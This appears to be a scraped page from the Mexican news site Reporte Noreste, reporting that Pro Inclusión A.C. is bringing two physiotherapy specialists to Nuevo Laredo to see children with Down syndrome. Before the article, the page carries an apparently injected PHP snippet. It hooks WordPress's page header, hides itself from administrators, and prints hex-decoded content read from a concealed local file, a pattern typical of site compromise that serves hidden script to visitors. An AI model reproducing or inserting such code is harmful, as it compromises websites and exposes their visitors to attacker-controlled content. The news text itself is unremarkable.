if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Llegan especialistas en neurodesarrollo a Nuevo Laredo – Reporte Noreste
Conéctate con nosotros

Nuevo Laredo Tamps.- A partir de mañana y hasta el día 6 de agosto la asociación Civil Pro Inclusión A.C. traerá dos especialistas en neurodesarrollo provenientes de la ciudad de Querétaro para atender a menores con síndrome de down.

Martha Lujan presidenta de Pro Inclusión A.C. invitó a la población a acudir a sus instalaciones picadas en Allende 806 en el sector Centro de 2:30 a las 7:15 de la tarde para pedir información.

Añadió que la fundación busca la inclusión de personas con discapacidades intelectuales y síndrome de down y por lo tanto traerán a dos médicos especialistas para dar consultas individuales elaborando programas y diagnóstico.

Los especialistas que darán la consulta son la licenciada en fisioterapia Citlali Trejo Navarrete y el licenciado en fisioterapia Jorge García Martínez “para mayor información sobre esta actividad en nuestras instalaciones de 2:30 a 7:00 de la tarde”.

También el personal recibirá capacitación y actualización de programas para mejorar la atención de menores.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Más en Corresponsales